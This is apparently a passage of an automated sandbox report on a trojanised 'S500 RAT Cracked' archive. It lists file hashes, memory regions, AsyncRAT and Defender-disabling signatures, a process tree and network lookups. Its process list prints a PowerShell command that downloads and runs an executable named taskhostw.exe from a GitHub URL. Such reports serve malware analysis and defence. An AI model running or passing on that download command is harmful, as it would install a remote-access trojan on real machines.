SHA512 d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

memory/2028-1517-0x000000001C350000-0x000000001C3D0000-memory.dmp

memory/2028-1518-0x000000001C350000-0x000000001C3D0000-memory.dmp

memory/2028-1506-0x000000001C350000-0x000000001C3D0000-memory.dmp

memory/1360-1569-0x0000000002020000-0x0000000002060000-memory.dmp

memory/2192-1573-0x000000001BD90000-0x000000001BE10000-memory.dmp

memory/2028-1574-0x000000001C350000-0x000000001C3D0000-memory.dmp

memory/2192-1575-0x000000001BD90000-0x000000001BE10000-memory.dmp

memory/2028-1576-0x000000001C350000-0x000000001C3D0000-memory.dmp

memory/1360-1577-0x0000000002020000-0x0000000002060000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab3AD8.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

C:\Users\Admin\AppData\Local\Temp\Tar3DAC.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\msgid.dat

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

memory/2192-1676-0x000007FEF5940000-0x000007FEF632C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-20 17:22

Reported

2024-03-20 17:47

Platform

win10-20240221-en

Max time kernel

1310s

Max time network

1217s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

Signatures

AsyncRat

rat asyncrat

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000\Software\Microsoft\Internet Explorer\TypedURLs C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings C:\Program Files\7-Zip\7zFM.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2332 wrote to memory of 312 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe
PID 2332 wrote to memory of 312 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe
PID 1800 wrote to memory of 3936 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe C:\Windows\System32\cmd.exe
PID 1800 wrote to memory of 3936 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe C:\Windows\System32\cmd.exe
PID 3936 wrote to memory of 2080 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 3936 wrote to memory of 2080 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 3936 wrote to memory of 1512 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
PID 3936 wrote to memory of 1512 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
PID 3936 wrote to memory of 3136 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3936 wrote to memory of 3136 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3936 wrote to memory of 4908 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\taskhostw.exe
PID 3936 wrote to memory of 4908 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\taskhostw.exe
PID 224 wrote to memory of 4148 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe C:\Windows\System32\cmd.exe
PID 224 wrote to memory of 4148 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe C:\Windows\System32\cmd.exe
PID 4148 wrote to memory of 4600 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 4148 wrote to memory of 4600 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 4148 wrote to memory of 1224 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
PID 4148 wrote to memory of 1224 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
PID 312 wrote to memory of 832 N/A C:\Program Files\7-Zip\7zFM.exe C:\Windows\system32\NOTEPAD.EXE
PID 312 wrote to memory of 832 N/A C:\Program Files\7-Zip\7zFM.exe C:\Windows\system32\NOTEPAD.EXE

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\S500 RAT Cracked\Readme.txt

C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe

"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CCA6.tmp\CCA7.tmp\CCA8.bat "C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe""

C:\Windows\system32\chcp.com

chcp 65001

C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe

ServerRegistrationManager.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Resources\stub.txt

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-WebRequest 'https://github.com/CVE-TEAMDSNH-20230611/20230611VNM/raw/main/taskhostw.exe' -OutFile taskhostw.exe"

C:\Windows\system32\taskhostw.exe

taskhostw.exe

C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe

"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D2CD.tmp\D2CE.tmp\D2CF.bat "C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe""

C:\Windows\system32\chcp.com

chcp 65001

C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe

ServerRegistrationManager.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zO831A2C0C\Stub.txt

C:\Users\Admin\Desktop\Stub.exe

"C:\Users\Admin\Desktop\Stub.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 7.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 45.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
DE 140.82.121.4:443 github.com tcp
US 8.8.8.8:53 github.githubassets.com udp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 4.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 154.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 129.134.221.88.in-addr.arpa udp

Files

C:\Users\Admin\Desktop\S500 RAT Cracked\Readme.txt

MD5 531208ea558a68c95339bea9517845c3
SHA1 95865bbeb196cf007626c92cdef1524c9b16dc5a
SHA256 dbceb36fa695bfe2bd706b22cb690976a3df77a46ec97d9188a3875308044b3a
SHA512 46f04b05cd14d80bef69325802464d190856af9f2844312f84263baf00eb14d3ca58d647fed8fcc5de0106883ec3f2546fed8b58ca09464fd6a336e7dece66f3

C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe

MD5 5b52658c4517684971de10a6b7a67c30
SHA1 f0820c52617ebacaf53d8b8d97f1a42c712888bd
SHA256 3ec85206a8c5d584c2cf4ab575bdd5cf4b29ed3a896032a1adc37f1c08507b31
SHA512 ce96d25cfbb0d2c4addf242aa05c05909d7a883a70881df8336498b16913ec21bd64c07519eba89b2da90a05902fd7618e172a7602b985153eac09d9f226c8d6

memory/1800-233-0x0000000000400000-0x0000000000439000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CCA6.tmp\CCA7.tmp\CCA8.bat

MD5 fc4af7384f0b6f274dd3e745f0aceeaa
SHA1 31b310f869b15b84e52ef282cabaee974e5043cf
SHA256 f27a781bd4e8788990ceecac17ba4b9642e15f0d311e17d62c70db694c207a34
SHA512 dc7b542d89236105c8b8976e5af0e9e557eaa919adb2e8384b55b70c0b5bc6f00d2010538b9abaca90bb797d24fd509acdc1b3a6beea27f11405bf198349f57f

C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe

MD5 aa2fc72b58059e5e7e9e7003ab466322
SHA1 e171576589134431baccb40d308e7dcbc776e087
SHA256 f107c0f275bd1c773e1ff2d78b60a4060b8353b02f45d3892968206fedffdf88
SHA512 26d69ad0d3f41bf08585307595e1d670c7d7905e1f86a566a36d9b0c836d3b349a6349e1f2885d433d35bd111f95ce004ae34e81443f96b73e784db3594e3eef

memory/1512-239-0x00007FFC5D1F0000-0x00007FFC5DBDC000-memory.dmp

memory/1512-240-0x000001E280000000-0x000001E2810C4000-memory.dmp

memory/1512-241-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\Guna.UI2.dll

MD5 0f07705bd42d86d77dab085c42775244
SHA1 7e4b5c367183f4753a8d610e353c458c3def3888
SHA256 cf9b66e11506fa431849350c0cb58430a71e5ec943d2db9ef1b2e2302f299443
SHA512 851b1a4c470ee7fe07ce5619c16fd391428585926c5b559694a9e445633ea51ec86c74a3bbf3bce39d943c4bf714dad2fd3c4a4d0703be2333541c79a2ee97f0

memory/1512-243-0x000001E29B2D0000-0x000001E29B4C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\c6ef4c2b-9a55-40b4-957b-c3cb74191397\GunaDotNetRT64.dll

MD5 9c43f77cb7cff27cb47ed67babe3eda5
SHA1 b0400cf68249369d21de86bd26bb84ccffd47c43
SHA256 f25b9288fe370dcfcb4823fb4e44ab88c7f5fce6e137d0dba389a3dba07d621e
SHA512 cde6fb6cf8db6f9746e69e6c10214e60b3646700d70b49668a2a792e309714dd2d4c5a5241977a833a95fcde8318abcc89eb9968a5039a0b75726bbfa27125a7

memory/1512-252-0x00007FFC4BDB0000-0x00007FFC4BEDC000-memory.dmp

memory/1512-251-0x00007FFC5EF50000-0x00007FFC5EF77000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\SunnyUI.dll

MD5 af527b22b92a23c38a492c5961cf2643
SHA1 15106adfa13415287b3e9d8deba21df53cb92eda
SHA256 4208c9293c5684d2fc3c8f5a269a1120adee32fbd2766bbb73410aab2d491b7a
SHA512 543cce9b5e4c9558bf0bd0da9d6af8c1ad2f7d62e2d65a9aa4e3af9e4840ce6fb6bbe8952bd20f6f1e3a6d3b5e5e5b3417a60b6d955bfa4e23a653262677b49c

memory/1512-254-0x000001E29B910000-0x000001E29BB50000-memory.dmp

memory/1512-255-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp

memory/1512-256-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp

memory/1512-257-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp

memory/1512-258-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp

memory/1512-259-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp

memory/1512-260-0x000001E29B8D0000-0x000001E29B902000-memory.dmp

memory/1512-261-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp

memory/1800-262-0x0000000000400000-0x0000000000439000-memory.dmp

memory/1512-263-0x00007FFC5D1F0000-0x00007FFC5DBDC000-memory.dmp

memory/1512-264-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\initialization.dll

MD5 3aaae3cec15b86693ae9fb8e1507c872
SHA1 ed8d0a139c609eb886482718ec2ecf96cbbe8c84
SHA256 a027b6b344e5a637bc8377fe58166273d2b76e92ff8c66bd505d46c21fe3b21b
SHA512 407558e01ade1832bb021b5af0209e7a6bef98ab35b9f4723a1add48362bd13f566697a8fb41af48c0bb15ca13585f9c09ac8d5da0feb322798c778b09cf4463

memory/1512-266-0x000001E2A1F90000-0x000001E2A1F9C000-memory.dmp

memory/1512-267-0x000001E2A1FC0000-0x000001E2A1FD2000-memory.dmp

memory/1512-268-0x000001E2A1CA0000-0x000001E2A1CAA000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\Certificate\ServerCertificate.p12

MD5 c60e527a85f285ddc66c2fcf160b1be7
SHA1 abcf2b6bffea9f0f30190783f6eae2434ef7a9a8
SHA256 35c46a9e9dc60a74a25572e743794a31fecd08672813d349a39f2d13b01e789f
SHA512 77a661544c2d7f2d8b870cdd503b806aea6de3a2b5aee19327c05aeef137a1df3661d249219fe73e7a300189c732efeb5d2004226c6e429fa024f1d3b1dec84e

C:\Users\Admin\Desktop\S500 RAT Cracked\SunnyUI.Common.dll

MD5 17cbdd9e4cb0ede2fad8c08c05fdaa84
SHA1 74bc0ea3e8bd64c6752b6c0adac1bfe2b313416c
SHA256 d975bc4711655e6fd2361ae9b056c617051f616ced5b46ce7772255a85712441
SHA512 1948c20585ecb9984cd9452a74bcb75e81c35ca37f0cf0e1d3f211ad71b9e40c215f4784af7803cec9baef9984f682a32817a85806aefad21830b13b6a0a6a4a

memory/1512-273-0x000001E2A1D00000-0x000001E2A1D3C000-memory.dmp

memory/1512-274-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp

memory/1512-275-0x00007FFC5EF50000-0x00007FFC5EF77000-memory.dmp

memory/1512-276-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp

memory/1512-277-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp

memory/1512-278-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp

memory/1512-280-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp

memory/1512-281-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp

memory/1512-282-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp

memory/1512-283-0x000001E29B0C0000-0x000001E29B0D0000-memory.dmp

memory/1512-287-0x000001E2A1D40000-0x000001E2A1E40000-memory.dmp

memory/1512-289-0x000001E2A1D40000-0x000001E2A1E40000-memory.dmp

memory/1512-290-0x000001E2A1D40000-0x000001E2A1E40000-memory.dmp

memory/1512-291-0x000001E2A1D40000-0x000001E2A1E40000-memory.dmp

C:\Users\Admin\Desktop\Resources\stub.txt

MD5 3fc302b81fdf520e4d3a170fe3ed0f0d
SHA1 9d821cc04064add1192decb54c76fdc9c4ef5747
SHA256 da3ab74adcfac4c84c23b564d7923beb706f62eb279cc6d945ac163721457f32
SHA512 b71077bb6703454c437cfdba4be2e9b86dfc9e3bb63ac89eeb9be0746c4f0b6b9d4bd16f7d44da9df89ab543420320dcd521115ea776c77fe32825836a86a552

memory/1512-370-0x00007FFC5D1F0000-0x00007FFC5DBDC000-memory.dmp

memory/3136-372-0x00007FFC5D1F0000-0x00007FFC5DBDC000-memory.dmp

memory/3136-377-0x0000022916090000-0x00000229160A0000-memory.dmp

memory/3136-376-0x0000022916090000-0x00000229160A0000-memory.dmp

memory/3136-378-0x0000022916060000-0x0000022916082000-memory.dmp

memory/3136-381-0x000002292E4F0000-0x000002292E566000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1k21x3pv.pbi.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3136-396-0x0000022916090000-0x00000229160A0000-memory.dmp

memory/3136-403-0x000002292F1C0000-0x000002292F966000-memory.dmp

memory/3136-521-0x00007FFC5D1F0000-0x00007FFC5DBDC000-memory.dmp

memory/1800-522-0x0000000000400000-0x0000000000439000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe

MD5 3c2de6bc2aad943c8ccfd2ae1d2db50d
SHA1 3c909af7b1e92472fec95641cfb0baa65d434886
SHA256 27c469c1ab1ecb80bc4fd2d60966174cd973456d584e0aa836811e726550d53d
SHA512 37a0c33b12cdaf1657f8080e2fe94ba7dc648e514f5ac779c3bb0a7938dfadfb6ee26db0204e10a194645da00883a7a4db2d04bd0850494ba2d12516c344000e

C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe

MD5 295a148a835de7e9dcfd7b852631289a
SHA1 91981906fdf1f36c6f0a2a1243457409588379ae
SHA256 963bcb01e62f49a6a26320fd1d4c7ba1cc8883de6fb5478bdc1509b3da699e86
SHA512 49363841c754d6ddee2c21668a389663065177c3bb97c827925e56c5957e60428bd33f82ce2666587f55cb5fdc15cb9e92708d4d8e2472706253a80e42239a5f

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ServerRegistrationManager.exe.log

MD5 fa931350508a2b855cce92719c4c207c
SHA1 3b6eb7b920d1c70b9f61b3745523b20828ecf21b
SHA256 1b6609def0e3a0533c446233db9438cdc1901a22acae76affbc4866e25595b0f
SHA512 b85d45035b1e62df0c1032c796796f6e30dd03a992744d9a67e0b812b8e4e690b4acc19921931bdac5f0e0cb4d5ef54f2161da3aadc922fee27a3f49fad6a856

memory/1224-530-0x00007FFC5D1F0000-0x00007FFC5DBDC000-memory.dmp

memory/1224-531-0x0000016DAD830000-0x0000016DAD840000-memory.dmp

memory/1224-534-0x00007FFC64A30000-0x00007FFC64A57000-memory.dmp

memory/1224-535-0x00007FFC5D0C0000-0x00007FFC5D1EC000-memory.dmp

memory/1224-536-0x0000016DAD830000-0x0000016DAD840000-memory.dmp

memory/1224-537-0x0000016DAD830000-0x0000016DAD840000-memory.dmp

memory/1224-538-0x0000016DAD830000-0x0000016DAD840000-memory.dmp

memory/1224-540-0x0000016DAD830000-0x0000016DAD840000-memory.dmp

memory/1224-539-0x0000016DAD830000-0x0000016DAD840000-memory.dmp

memory/1224-541-0x0000016DAD830000-0x0000016DAD840000-memory.dmp

memory/224-542-0x0000000000400000-0x0000000000439000-memory.dmp

memory/1224-543-0x00007FFC5D1F0000-0x00007FFC5DBDC000-memory.dmp

memory/1224-544-0x0000016DAD830000-0x0000016DAD840000-memory.dmp

memory/1224-547-0x0000016DAD830000-0x0000016DAD840000-memory.dmp

memory/1224-548-0x00007FFC64A30000-0x00007FFC64A57000-memory.dmp

memory/1224-549-0x0000016DAD830000-0x0000016DAD840000-memory.dmp

memory/1224-550-0x0000016DAD830000-0x0000016DAD840000-memory.dmp

memory/1224-551-0x0000016DAD830000-0x0000016DAD840000-memory.dmp

memory/1224-552-0x0000016DAD830000-0x0000016DAD840000-memory.dmp

memory/1224-553-0x0000016DAD830000-0x0000016DAD840000-memory.dmp

memory/1224-555-0x0000016DAD830000-0x0000016DAD840000-memory.dmp

memory/1224-556-0x0000016DAD830000-0x0000016DAD840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zO831A2C0C\Stub.txt

MD5 fd7b1162b84b0add4146e3bc0d13b7dd
SHA1 1fb46807f499267832aa444e12c403df880855bb
SHA256 972c912943000017fe92e563d4b7a5147f15825718edcb17307af79f85ac5f10
SHA512 6f5ff1aff1c899f9ae48cd177fd1bb277b2b9a7395858de1077392c293a4c68307d55d84a7c9968342da5a1296e720b00d8cd6f42b5faa11b7c643260eac300d